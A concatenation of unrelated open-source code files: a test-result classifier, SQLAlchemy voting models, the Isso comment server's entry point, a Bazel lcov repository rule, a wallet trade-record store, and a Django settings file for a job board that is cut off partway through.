classified_results[test_name].num_expected_results = test_info[
"num_expected_results"]
classified_results[test_name].num_unexpected_results = test_info[
"num_unexpected_results"]
if test_info["num_passed"]:
classified_results[test_name].results.passes['PASS'] = test_info[
"num_passed"]
if test_info["num_failed"]:
classified_results[test_name].results.failures['FAIL'] = test_info[
"num_failed"]
if test_info["num_crashed"]:
classified_results[test_name].results.failures['CRASH'] = test_info[
"num_crashed"]
if test_info["num_aborted"]:
classified_results[test_name].results.failures['ABORT'] = test_info[
"num_aborted"]
if test_info["num_skipped"]:
classified_results[test_name].results.skips['SKIP'] = test_info[
"num_skipped"]
if test_info["num_notrun"]:
classified_results[test_name].results.notruns['SKIP'] = test_info[
"num_notrun"]
if test_info["num_unspecified"]:
classified_results[test_name].results.unknowns[
'UNSPECIFIED'] = test_info["num_unspecified"]
return classified_results
def GetTestLocation(self, test_name):
"""Gets test location for a specific test.
Returns: A tuple containing
* A dictionary of {
"line": line number of the test
"file": file path to the test
}
* A possible error string
"""
location = self.test_results.get(test_name, {}).get('test_location')
if not location:
return None, 'test location not found'
return location, None
def DoesTestExist(self, test_name):
return test_name in self.test_results
def IsTestResultUseful(self):
return len(self.test_results) > 0
@staticmethod
def group_test_results_by_test_name(test_results):
# pylint: disable=line-too-long
"""Returns a dictionary of
{
<test_name>:{
"reliable_failure": whether the test fail consistently
"failure_logs": array of dictionary {
"name": test result name (e.g. invocations/task-chromium-swarm.appspot.com-508dcba4306cae11/tests/ninja:%2F%2Fgpu:gl_tests%2FSharedImageGLBackingProduceDawnTest.Basic/results/c649f775-00777)
"summary_html": summary_html of a run
}
"test_type": type of test
"test_location": location of the test
"total_run": number of runs for the test
"num_expected_results": number of expected runs
"num_unexpected_results": number of unexpected runs
"num_passed": number of passed results
"num_failed": number of failed results
"num_crashed": number of crashed results
"num_aborted": number of aborted results
"num_skipped": number of skipped results
"num_notrun": number of not run results
"num_unspecified": number of unspecified results
}
}
Arguments:
test_results: Array of ResultDB TestResult object
"""
results = defaultdict(dict)
for test_result in test_results:
test_name = ResultDBTestResults.test_name_for_test_result(test_result)
if not test_name:
continue
is_failure = ResultDBTestResults.is_failure(test_result)
log = {
"name":
test_result.name,
"summary_html":
ResultDBTestResults.summary_html_for_test_result(test_result)
}
if not results.get(test_name):
results[test_name] = {
"reliable_failure":
is_failure,
"failure_logs": [log] if is_failure else [],
"test_type":
ResultDBTestResults.test_type_for_test_result(test_result),
"test_location":
ResultDBTestResults.test_location_for_test_result(test_result),
"total_run":
0,
"num_expected_results":
0,
"num_unexpected_results":
0,
"num_passed":
0,
"num_failed":
0,
"num_crashed":
0,
"num_aborted":
0,
"num_skipped":
0,
"num_notrun":
0,
"num_unspecified":
0,
}
else:
results[test_name]["reliable_failure"] = results[test_name][
"reliable_failure"] and is_failure
if is_failure:
results[test_name]["failure_logs"].append(log)
ResultDBTestResults._update_classified_test_results(
results[test_name], test_result)
return results
@staticmethod
def _update_classified_test_results(classified_results, test_result):
"""Update classified_results with a test result object
Arguments:
classified_results: A dictionary containing results for a test ID
test_result: A luci.resultdb.v1.TestResult object
"""
classified_results["total_run"] += 1
if test_result.expected:
classified_results["num_expected_results"] += 1
else:
classified_results["num_unexpected_results"] += 1
if test_result.status == test_result_pb2.TestStatus.PASS:
classified_results["num_passed"] += 1
elif test_result.status == test_result_pb2.TestStatus.FAIL:
classified_results["num_failed"] += 1
elif test_result.status == test_result_pb2.TestStatus.CRASH:
classified_results["num_crashed"] += 1
elif test_result.status == test_result_pb2.TestStatus.ABORT:
classified_results["num_aborted"] += 1
elif test_result.status == test_result_pb2.TestStatus.SKIP:
if test_result.expected:
classified_results["num_skipped"] += 1
else:
classified_results["num_notrun"] += 1
else:
classified_results["num_unspecified"] += 1
@staticmethod
def is_failure(test_result):
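    # A result only counts as a failure when its status is FAIL, CRASH or ABORT *and* it was unexpected.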
return test_result.status in _FAILURE_STATUSES and not test_result.expected
@staticmethod
def test_name_for_test_result(test_result):
"""Returns the test name for luci.resultdb.v1.TestResult object
Arguments:
test_result: A luci.resultdb.v1.TestResult object
"""
for tag in test_result.tags or []:
if tag.key == "test_name":
return tag.value
logging.warning("There is no test name for test_id: %s",
test_result.test_id)
return None
@staticmethod
def summary_html_for_test_result(test_result):
return test_result.summary_html or ""
@staticmethod
def test_type_for_test_result(test_result):
"""Return a ResultDBTestType for test_result"""
if "blink_web_tests" in test_result.test_id:
return ResultDBTestType.BLINK
if test_result.tags:
for tag in test_result.tags:
if "gtest" in tag.key:
return ResultDBTestType.GTEST
return ResultDBTestType.OTHER
@staticmethod
def test_location_for_test_result(test_result):
"""Return test location for test_result"""
if (not test_result.test_metadata or
not test_result.test_metadata.location or
not test_result.test_metadata.location.file_name):
return None
return {
"line": test_result.test_metadata.location.line,
"file": test_result.test_metadata.location.file_name
}
@staticmethod
def get_detailed_failure_log(test_type, failure_log):
"""Gets the detailed failure log from artifact if possible
For gtest, if there is stack_trace artifact, download the content of the
artifact. Otherwise, just return summaryHTML
Argument:
test_type: ResultDBTestType
failure_log: Dictionary of {"name":..., "summary_html":...}
Returns:
A string for the detailed failure logs
"""
summary_html = failure_log["summary_html"]
if test_type != ResultDBTestType.GTEST:
return summary_html
# We only check for "stack_trace" artifact if "stack_trace" presents in
# summary_html
if "stack_trace" not in summary_html:
return summary_html
test_result_name = failure_log["name"]
artifacts = resultdb.list_artifacts(test_result_name) or []
stack_trace_artifact = next(
(a for a in artifacts if a.artifact_id == "stack_trace"), None)
if not stack_trace_artifact:
return summary_html
fetch_url = stack_trace_artifact.fetch_url
content, error = http_client_util.SendRequestToServer(
fetch_url, _FINDIT_HTTP_CLIENT)
if not error:
return content
logging.warning("Unable to fetch content from %s: %s", fetch_url, error)
return summary_html
|
py | 1a3f61846c5ecfa4a855eb08fa250b19537e1f31 | from application import db
from sqlalchemy.orm import relationship
class Sessao(db.Model):
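    # A legislative session: it has a name and a date and groups the roll-call votes (Votacao) held in it.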
id = db.Column(db.Integer, primary_key=True)
nome = db.Column(db.Text)
data = db.Column(db.Date())
votacao = relationship("Votacao", back_populates="sessao")
class Partido(db.Model):
id = db.Column(db.Integer, primary_key=True)
nome = db.Column(db.Text)
vereador = db.relationship('Vereador', backref='partido', lazy='dynamic')
class Vereador(db.Model):
id = db.Column(db.Integer, primary_key=True)
nome = db.Column(db.Text)
idparlamentar = db.Column(db.Integer)
partido_id = db.Column(db.Integer, db.ForeignKey('partido.id'))
votos = relationship("Voto", back_populates="vereador")
class Votacao(db.Model):
id = db.Column(db.Integer, primary_key=True)
votacaoid = db.Column(db.Integer)
sessao_id = db.Column(db.Integer, db.ForeignKey('sessao.id'))
tipo = db.Column(db.Text)
materia = db.Column(db.Text)
ementa = db.Column(db.Text)
resultado = db.Column(db.Text)
presentes = db.Column(db.Integer)
sim = db.Column(db.Integer)
nao = db.Column(db.Integer)
abstencao = db.Column(db.Integer)
branco = db.Column(db.Integer)
notas_rodape = db.Column(db.Text)
votos = relationship("Voto", back_populates="votacao")
sessao = relationship("Sessao", back_populates="votacao")
class Voto(db.Model):
id = db.Column(db.Integer, primary_key=True)
votacao_id = db.Column(db.Integer, db.ForeignKey('votacao.id'))
vereador_id = db.Column(db.Integer, db.ForeignKey('vereador.id'))
valor = db.Column(db.Text)
vereador = relationship("Vereador", back_populates="votos")
votacao = relationship("Votacao", back_populates="votos")
|
py | 1a3f62fe49ddb034742bf023d9d2d51b1b5c1667 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
#
# The MIT License (MIT)
#
# Copyright (c) 2012-2014 Martin Zimmermann.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# Isso – a lightweight Disqus alternative
from __future__ import print_function, unicode_literals
import pkg_resources
dist = pkg_resources.get_distribution("isso")
# check if exectuable is `isso` and gevent is available
import sys
if sys.argv[0].startswith("isso"):
try:
import gevent.monkey
gevent.monkey.patch_all()
except ImportError:
pass
import os
import errno
import logging
import tempfile
from os.path import dirname, join
from argparse import ArgumentParser
from functools import partial, reduce
import pkg_resources
werkzeug = pkg_resources.get_distribution("werkzeug")
from itsdangerous import URLSafeTimedSerializer
from werkzeug.routing import Map
from werkzeug.exceptions import HTTPException, InternalServerError
from werkzeug.middleware.shared_data import SharedDataMiddleware
from werkzeug.local import Local, LocalManager
from werkzeug.serving import run_simple
from werkzeug.middleware.proxy_fix import ProxyFix
from werkzeug.middleware.profiler import ProfilerMiddleware
local = Local()
local_manager = LocalManager([local])
from isso import config, db, db_psql, migrate, wsgi, ext, views
from isso.core import ThreadedMixin, ProcessMixin, uWSGIMixin
from isso.wsgi import origin, urlsplit
from isso.utils import http, JSONRequest, html, hash
from isso.views import comments
from isso.ext.notifications import Stdout, SMTP
logging.getLogger('werkzeug').setLevel(logging.WARN)
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s %(levelname)s: %(message)s")
logger = logging.getLogger("isso")
class ProxyFixCustom(ProxyFix):
def __init__(self, app):
# This is needed for werkzeug.wsgi.get_current_url called in isso/views/comments.py
# to work properly when isso is hosted under a sub-path
# cf. https://werkzeug.palletsprojects.com/en/1.0.x/middleware/proxy_fix/
super().__init__(app, x_prefix=1)
class Isso(object):
def __init__(self, conf):
self.conf = conf
db_type = conf.get('general', 'db-type')
if db_type == 'psql':
self.db = db_psql.PSQL(conf.get('general', 'dbpath'), conf)
else:
self.db = db.SQLite3(conf.get('general', 'dbpath'), conf)
self.signer = URLSafeTimedSerializer(
self.db.preferences.get("session-key"))
self.markup = html.Markup(conf.section('markup'))
self.hasher = hash.new(conf.section("hash"))
super(Isso, self).__init__(conf)
subscribers = []
smtp_backend = False
for backend in conf.getlist("general", "notify"):
if backend == "stdout":
subscribers.append(Stdout(None))
elif backend in ("smtp", "SMTP"):
smtp_backend = True
else:
logger.warn("unknown notification backend '%s'", backend)
if smtp_backend or conf.getboolean("general", "reply-notifications"):
subscribers.append(SMTP(self))
self.signal = ext.Signal(*subscribers)
self.urls = Map()
views.Info(self)
views.Metrics(self)
comments.API(self, self.hasher)
def render(self, text):
return self.markup.render(text)
def sign(self, obj):
return self.signer.dumps(obj)
def unsign(self, obj, max_age=None):
return self.signer.loads(obj, max_age=max_age or self.conf.getint('general', 'max-age'))
def dispatch(self, request):
local.request = request
local.host = wsgi.host(request.environ)
local.origin = origin(self.conf.getiter(
"general", "host"))(request.environ)
adapter = self.urls.bind_to_environ(request.environ)
try:
handler, values = adapter.match()
except HTTPException as e:
return e
else:
try:
response = handler(request.environ, request, **values)
except HTTPException as e:
return e
except Exception:
logger.exception("%s %s", request.method,
request.environ["PATH_INFO"])
return InternalServerError()
else:
return response
def wsgi_app(self, environ, start_response):
response = self.dispatch(JSONRequest(environ))
return response(environ, start_response)
def __call__(self, environ, start_response):
return self.wsgi_app(environ, start_response)
def make_app(conf=None, threading=True, multiprocessing=False, uwsgi=False):
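    # Build the WSGI application: pick a concurrency mixin (threading, multiprocessing or uWSGI),
    # check that the configured website is reachable, and wrap the app in the middleware stack below.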
if not any((threading, multiprocessing, uwsgi)):
raise RuntimeError("either set threading, multiprocessing or uwsgi")
if threading:
class App(Isso, ThreadedMixin):
pass
elif multiprocessing:
class App(Isso, ProcessMixin):
pass
else:
class App(Isso, uWSGIMixin):
pass
isso = App(conf)
# check HTTP server connection
for host in conf.getiter("general", "host"):
with http.curl('HEAD', host, '/', 5) as resp:
if resp is not None:
logger.info("connected to %s", host)
break
else:
logger.warn("unable to connect to your website, Isso will probably not "
"work correctly. Please make sure, Isso can reach your "
"website via HTTP(S).")
wrapper = [local_manager.make_middleware]
if isso.conf.getboolean("server", "profile"):
wrapper.append(partial(ProfilerMiddleware,
sort_by=("cumulative", ), restrictions=("isso/(?!lib)", 10)))
wrapper.append(partial(SharedDataMiddleware, exports={
'/js': join(dirname(__file__), 'js/'),
'/css': join(dirname(__file__), 'css/'),
'/img': join(dirname(__file__), 'img/'),
'/demo': join(dirname(__file__), 'demo/')
}))
wrapper.append(partial(wsgi.CORSMiddleware,
origin=origin(isso.conf.getiter("general", "host")),
allowed=("Origin", "Referer", "Content-Type"),
exposed=("X-Set-Cookie", "Date")))
wrapper.extend([wsgi.SubURI, ProxyFixCustom])
if werkzeug.version.startswith("0.8"):
wrapper.append(wsgi.LegacyWerkzeugMiddleware)
return reduce(lambda x, f: f(x), wrapper, isso)
def main():
parser = ArgumentParser(description="a blog comment hosting service")
subparser = parser.add_subparsers(help="commands", dest="command")
parser.add_argument('--version', action='version',
version='%(prog)s ' + dist.version)
parser.add_argument("-c", dest="conf", default="/etc/isso.conf",
metavar="/etc/isso.conf", help="set configuration file")
imprt = subparser.add_parser('import', help="import Disqus XML export")
imprt.add_argument("dump", metavar="FILE")
imprt.add_argument("-n", "--dry-run", dest="dryrun", action="store_true",
help="perform a trial run with no changes made")
imprt.add_argument("-t", "--type", dest="type", default=None,
choices=["disqus", "wordpress", "generic"], help="export type")
imprt.add_argument("--empty-id", dest="empty_id", action="store_true",
help="workaround for weird Disqus XML exports, #135")
# run Isso as stand-alone server
subparser.add_parser("run", help="run server")
args = parser.parse_args()
conf = config.load(
join(dist.location, dist.project_name, "defaults.ini"), args.conf)
if args.command == "import":
conf.set("guard", "enabled", "off")
if args.dryrun:
xxx = tempfile.NamedTemporaryFile()
dbpath = xxx.name
else:
dbpath = conf.get("general", "dbpath")
mydb = db.SQLite3(dbpath, conf)
migrate.dispatch(args.type, mydb, args.dump, args.empty_id)
sys.exit(0)
if conf.get("general", "log-file"):
handler = logging.FileHandler(conf.get("general", "log-file"))
logger.addHandler(handler)
logging.getLogger("werkzeug").addHandler(handler)
logger.propagate = False
logging.getLogger("werkzeug").propagate = False
if not any(conf.getiter("general", "host")):
logger.error("No website(s) configured, Isso won't work.")
sys.exit(1)
if conf.get("server", "listen").startswith("http://"):
host, port, _ = urlsplit(conf.get("server", "listen"))
try:
from gevent.pywsgi import WSGIServer
WSGIServer((host, port), make_app(conf)).serve_forever()
except ImportError:
run_simple(host, port, make_app(conf), threaded=True,
use_reloader=conf.getboolean('server', 'reload'))
else:
sock = conf.get("server", "listen").partition("unix://")[2]
try:
os.unlink(sock)
except OSError as ex:
if ex.errno != errno.ENOENT:
raise
wsgi.SocketHTTPServer(sock, make_app(conf)).serve_forever()
|
bzl | 1a3f6447fd07a61a7fdbdda11bdda877726aea44 | # Copyright 2018 The Bazel Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Coverage report generation."""
load("@bazel_tools//tools/build_defs/repo:git.bzl", "new_git_repository")
_LCOV_BUILD_FILE_CONTENT = """
filegroup(
name = "bin",
srcs = glob(["bin/**/*"]),
visibility = ["//visibility:public"],
)
"""
def bazel_coverage_report_repositories():
"""Add to the WORKSPACE external dependencies needed by the generator.
"""
if "lcov" not in native.existing_rules():
new_git_repository(
name = "lcov",
build_file_content = _LCOV_BUILD_FILE_CONTENT,
commit = "a5dd9529f9232b8d901a4d6eb9ae54cae179e5b3",
remote = "https://github.com/linux-test-project/lcov.git",
)
|
py | 1a3f64c5ed1306924043598969eeed5c125fa7aa | from typing import List, Optional
import aiosqlite
from aloe.types.blockchain_format.sized_bytes import bytes32
from aloe.types.mempool_inclusion_status import MempoolInclusionStatus
from aloe.util.db_wrapper import DBWrapper
from aloe.util.errors import Err
from aloe.util.ints import uint8, uint32
from aloe.wallet.trade_record import TradeRecord
from aloe.wallet.trading.trade_status import TradeStatus
class TradeStore:
"""
TradeStore stores trading history.
"""
db_connection: aiosqlite.Connection
cache_size: uint32
db_wrapper: DBWrapper
@classmethod
async def create(cls, db_wrapper: DBWrapper, cache_size: uint32 = uint32(600000)):
self = cls()
self.cache_size = cache_size
self.db_wrapper = db_wrapper
self.db_connection = db_wrapper.db
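        # WAL journaling together with synchronous=2 (FULL) keeps writes durable while still allowing concurrent reads.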
await self.db_connection.execute("pragma journal_mode=wal")
await self.db_connection.execute("pragma synchronous=2")
await self.db_connection.execute(
(
"CREATE TABLE IF NOT EXISTS trade_records("
" trade_record blob,"
" trade_id text PRIMARY KEY,"
" status int,"
" confirmed_at_index int,"
" created_at_time bigint,"
" sent int)"
)
)
await self.db_connection.execute(
"CREATE INDEX IF NOT EXISTS trade_confirmed_index on trade_records(confirmed_at_index)"
)
await self.db_connection.execute("CREATE INDEX IF NOT EXISTS trade_status on trade_records(status)")
await self.db_connection.execute("CREATE INDEX IF NOT EXISTS trade_id on trade_records(trade_id)")
await self.db_connection.commit()
return self
async def _clear_database(self):
cursor = await self.db_connection.execute("DELETE FROM trade_records")
await cursor.close()
await self.db_connection.commit()
async def add_trade_record(self, record: TradeRecord, in_transaction) -> None:
"""
Store TradeRecord into DB
"""
if not in_transaction:
await self.db_wrapper.lock.acquire()
try:
cursor = await self.db_connection.execute(
"INSERT OR REPLACE INTO trade_records VALUES(?, ?, ?, ?, ?, ?)",
(
bytes(record),
record.trade_id.hex(),
record.status,
record.confirmed_at_index,
record.created_at_time,
record.sent,
),
)
await cursor.close()
finally:
if not in_transaction:
await self.db_connection.commit()
self.db_wrapper.lock.release()
async def set_status(self, trade_id: bytes32, status: TradeStatus, in_transaction: bool, index: uint32 = uint32(0)):
"""
Updates the status of the trade
"""
current: Optional[TradeRecord] = await self.get_trade_record(trade_id)
if current is None:
return None
confirmed_at_index = current.confirmed_at_index
if index != 0:
confirmed_at_index = index
tx: TradeRecord = TradeRecord(
confirmed_at_index=confirmed_at_index,
accepted_at_time=current.accepted_at_time,
created_at_time=current.created_at_time,
my_offer=current.my_offer,
sent=current.sent,
spend_bundle=current.spend_bundle,
tx_spend_bundle=current.tx_spend_bundle,
additions=current.additions,
removals=current.removals,
trade_id=current.trade_id,
status=uint32(status.value),
sent_to=current.sent_to,
)
await self.add_trade_record(tx, in_transaction)
async def increment_sent(
self,
id: bytes32,
name: str,
send_status: MempoolInclusionStatus,
err: Optional[Err],
) -> bool:
"""
Updates trade sent count (Full Node has received spend_bundle and sent ack).
"""
current: Optional[TradeRecord] = await self.get_trade_record(id)
if current is None:
return False
sent_to = current.sent_to.copy()
err_str = err.name if err is not None else None
append_data = (name, uint8(send_status.value), err_str)
# Don't increment count if it's already sent to this peer
if append_data in sent_to:
return False
sent_to.append(append_data)
tx: TradeRecord = TradeRecord(
confirmed_at_index=current.confirmed_at_index,
accepted_at_time=current.accepted_at_time,
created_at_time=current.created_at_time,
my_offer=current.my_offer,
sent=uint32(current.sent + 1),
spend_bundle=current.spend_bundle,
tx_spend_bundle=current.tx_spend_bundle,
additions=current.additions,
removals=current.removals,
trade_id=current.trade_id,
status=current.status,
sent_to=sent_to,
)
await self.add_trade_record(tx, False)
return True
async def set_not_sent(self, id: bytes32):
"""
Updates trade sent count to 0.
"""
current: Optional[TradeRecord] = await self.get_trade_record(id)
if current is None:
return None
tx: TradeRecord = TradeRecord(
confirmed_at_index=current.confirmed_at_index,
accepted_at_time=current.accepted_at_time,
created_at_time=current.created_at_time,
my_offer=current.my_offer,
sent=uint32(0),
spend_bundle=current.spend_bundle,
tx_spend_bundle=current.tx_spend_bundle,
additions=current.additions,
removals=current.removals,
trade_id=current.trade_id,
status=uint32(TradeStatus.PENDING_CONFIRM.value),
sent_to=[],
)
await self.add_trade_record(tx, False)
async def get_trade_record(self, trade_id: bytes32) -> Optional[TradeRecord]:
"""
Checks DB for TradeRecord with id: id and returns it.
"""
cursor = await self.db_connection.execute("SELECT * from trade_records WHERE trade_id=?", (trade_id.hex(),))
row = await cursor.fetchone()
await cursor.close()
if row is not None:
record = TradeRecord.from_bytes(row[0])
return record
return None
async def get_trade_record_with_status(self, status: TradeStatus) -> List[TradeRecord]:
"""
Checks DB for TradeRecord with id: id and returns it.
"""
cursor = await self.db_connection.execute("SELECT * from trade_records WHERE status=?", (status.value,))
rows = await cursor.fetchall()
await cursor.close()
records = []
for row in rows:
record = TradeRecord.from_bytes(row[0])
records.append(record)
return records
async def get_not_sent(self) -> List[TradeRecord]:
"""
Returns the list of trades that have not been received by full node yet.
"""
        cursor = await self.db_connection.execute(
            # the trade_records schema has no "confirmed" column; confirmed_at_index == 0 marks unconfirmed trades
            "SELECT * from trade_records WHERE sent<? and confirmed_at_index=?",
(
4,
0,
),
)
rows = await cursor.fetchall()
await cursor.close()
records = []
for row in rows:
record = TradeRecord.from_bytes(row[0])
records.append(record)
return records
async def get_all_unconfirmed(self) -> List[TradeRecord]:
"""
Returns the list of all trades that have not yet been confirmed.
"""
        cursor = await self.db_connection.execute("SELECT * from trade_records WHERE confirmed_at_index=?", (0,))
rows = await cursor.fetchall()
await cursor.close()
records = []
for row in rows:
record = TradeRecord.from_bytes(row[0])
records.append(record)
return records
async def get_all_trades(self) -> List[TradeRecord]:
"""
Returns all stored trades.
"""
cursor = await self.db_connection.execute("SELECT * from trade_records")
rows = await cursor.fetchall()
await cursor.close()
records = []
for row in rows:
record = TradeRecord.from_bytes(row[0])
records.append(record)
return records
async def get_trades_above(self, height: uint32) -> List[TradeRecord]:
cursor = await self.db_connection.execute("SELECT * from trade_records WHERE confirmed_at_index>?", (height,))
rows = await cursor.fetchall()
await cursor.close()
records = []
for row in rows:
record = TradeRecord.from_bytes(row[0])
records.append(record)
return records
async def rollback_to_block(self, block_index):
# Delete from storage
cursor = await self.db_connection.execute(
"DELETE FROM trade_records WHERE confirmed_at_index>?", (block_index,)
)
await cursor.close()
await self.db_connection.commit()
|
py | 1a3f651a8c20a94cdcb9fc51031483fe76973d5a | """
Django settings for pyjobs project.
Generated by 'django-admin startproject' using Django 1.11.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
from decouple import config
from dj_database_url import parse as db_url
from django.utils.translation import gettext_lazy as _
from unipath import Path
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
BASE_DIR_PARENT = Path(__file__).parent
PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = config("SECRET_KEY")
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = config("DEBUG", default=False, cast=bool)
ALLOWED_HOSTS = ["*"]
# E-mail
DEFAULT_FROM_EMAIL = config("DEFAULT_FROM_EMAIL", default="[email protected]")
# Application definition
INSTALLED_APPS = [
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
"django.contrib.humanize",
"django.contrib.sites",
"django_extensions",
"django.contrib.redirects",
"pyjobs.core",
"pyjobs.api",
"pyjobs.marketing",
"pyjobs.partners",
"pyjobs.profiler",
"pyjobs.synchronizer",
"pyjobs.assessment",
"widget_tweaks",
"social_django",
"django_select2",
"django.contrib.sitemaps",
"raven.contrib.django.raven_compat",
"webpush",
]
MIDDLEWARE = [
"pyjobs.middleware.RedirectFallbackMiddleware",
"django.middleware.security.SecurityMiddleware",
"django.middleware.locale.LocaleMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
"whitenoise.middleware.WhiteNoiseMiddleware",
"social_django.middleware.SocialAuthExceptionMiddleware",
]
ROOT_URLCONF = "pyjobs.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [BASE_DIR + "/templates"],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
"pyjobs.core.context_processors.global_vars",
"social_django.context_processors.backends",
"social_django.context_processors.login_redirect",
]
},
},
]
WSGI_APPLICATION = "pyjobs.wsgi.application"
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
"default": config(
"DATABASE_URL",
default="sqlite:///" + BASE_DIR_PARENT.child("db.sqlite3"),
cast=db_url,
)
}
THUMBNAILS_BASE_FOLDER = "%s/pyjobs/core/thumb/" % (BASE_DIR)
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator"
},
{"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator"},
{"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator"},
{"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator"},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = "pt"
TIME_ZONE = "America/Sao_Paulo"
USE_I18N = True
USE_L10N = True
USE_TZ = False
LOCALE_PATHS = [os.path.join(PROJECT_ROOT, "translations")]
LANGUAGES = [
("pt", _("Portuguese")),
("en", _("English")),
]
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = "/static/"
STATIC_ROOT = os.path.join(PROJECT_ROOT, "static")
STATICFILES_FINDERS = [
"django.contrib.staticfiles.finders.FileSystemFinder",
"django.contrib.staticfiles.finders.AppDirectoriesFinder",
]
STATICFILES_DIRS = (os.path.join(PROJECT_ROOT, "staticfiles"),)
RAVEN_CONFIG = {"dsn": config("SENTRY_DSN", default=None)}
LOGIN_REDIRECT_URL = "/"
LOGIN_URL = "/login"
LOGOUT_REDIRECT_URL = "/"
EMAIL_BACKEND = config(
"EMAIL_BACKEND", default="django.core.mail.backends.console.EmailBackend"
)
SENDGRID_API_KEY = config("SENDGRID_API_KEY", default=None)
GA_CODE = config("GA_CODE", default="")
# MailChimp
MAILCHIMP_API_KEY = config("MAILCHIMP_API_KEY", default=None)
MAILCHIMP_USERNAME = config("MAILCHIMP_USERNAME", default=None)
MAILCHIMP_LIST_KEY = config("MAILCHIMP_LIST_KEY", default=None)
# Telegram
TELEGRAM_TOKEN = config("TELEGRAM_TOKEN", default=None)
TELEGRAM_CHATID = config("TELEGRAM_CHATID", default=None)
# Recaptcha
RECAPTCHA_SECRET_KEY = config("RECAPTCHA_SECRET_KEY", default=None)
# Force SSL
if "DYNO" in os.environ: # pragma: no cover
SECURE_SSL_REDIRECT = config("SECURE_SSL_REDIRECT", default=False)
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
WEBSITE_NAME = config("WEBSITE_NAME", default=None)
WEBSITE_SLOGAN = config("WEBSITE_SLOGAN", default=None)
WEBSITE_URL = config("WEBSITE_URL", default=None)
WEBSITE_OWNER_EMAIL = config("WEBSITE_OWNER_EMAIL", default=None)
WEBSITE_OWNER_CELLPHONE = config("WEBSITE_OWNER_CELLPHONE", default=None)
WEBSITE_GENERAL_EMAIL = config("WEBSITE_GENERAL_EMAIL", default=None)
WEBSITE_WORKING_LANGUAGE = config("WEBSITE_WORKING_LANGUAGE", default=None)
WEBSITE_MAILINGLIST_LINK = config("WEBSITE_MAILINGLIST_LINK", default=None)
WEBSITE_OWNER_NAME = config("WEBSITE_OWNER_NAME", default=None)
USER_SUBSTANTIVE = config("USER_SUBSTANTIVE", default=None)
WEBSITE_HOME_URL = config("WEBSITE_HOME_URL", default=None)
MAILERLITE_API_KEY = config("MAILERLITE_API_KEY", default=None)
GITHUB_ACCESS_TOKEN = config("GITHUB_ACCESS_TOKEN", default=None)
GITHUB_ISSUES_LABELS = config("GITHUB_ISSUES_LABELS", default=None)
GITHUB_DEFAULT_REPO = config("GITHUB_DEFAULT_REPO", default=None)
WEBSITE_MANAGERS_GITHUB_NICKNAME = config(
"WEBSITE_MANAGERS_GITHUB_NICKNAME", default=None
)
WEBPUSH_SETTINGS = {
"VAPID_PUBLIC_KEY": config("VAPID_PUBLIC_KEY", default=None),
"VAPID_PRIVATE_KEY": config("VAPID_PRIVATE_KEY", default=None),
"VAPID_ADMIN_EMAIL": config("VAPID_ADMIN_EMAIL", default=None),
}
STATE_CHOICES = [
(0, _("Acre")),
(1, _("Alagoas")),
(2, _("Amapá")),
(3, _("Amazonas")),
(4, _("Bahia")),
(5, _("Ceará")),
(6, _("Distrito Federal")),
(7, _("Espírito Santo")),
(8, _("Goiás")),
(9, _("Maranhão")),
(10, _("Mato Grosso")),
(11, _("Mato Grosso do Sul")),
